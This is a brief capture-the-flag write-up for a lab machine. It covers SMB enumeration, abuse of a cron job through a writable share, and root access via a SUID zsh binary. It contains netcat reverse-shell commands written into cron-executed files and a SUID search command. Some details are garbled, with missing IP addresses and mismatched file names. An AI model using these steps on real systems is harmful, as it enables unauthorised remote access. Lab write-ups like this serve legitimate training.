We use the tools called netdiscover scan hosts, we found the is our target virtualbox host ip.
We found some services HTTP, SMB, MYSQL
When we see smbd service , we use enum4linux scan smbd service config and basic infomation, we not found user but we find a smb share filefolder: IPC$ , ITDEPT and user: dawn, ganimedes
By using smbclient connect , We could found this existed web-control, product-control.
At First, I intend to try a dict by kail linux to do a basic dir scanner, if not successfully , i will try a big dir dict by gobuster , luckily, we find /logs is existd.
When we link to this, We can find some file。By reading these files, this management.log is a log file, we can find target host exists a crontab job chmod 777 product-control, web-control, so that we can reverse shell by these two file with samba share file folder.
echo 'nc -e /bin/sh 2333' > web_product
echo 'nc -e /bin/sh 2334' > product_product
wait a little time , then crontab job run.....
we use dawn users, we do some privilege escalate.
find / -perm -u=s 2>/dev/null
So we use /usr/bin/zsh to do it.
congratulation... then we go into /root, can see this flag.
OS: Other ways, i will append in my github if i can find themselves.T_T
That' all , Thanks for your watching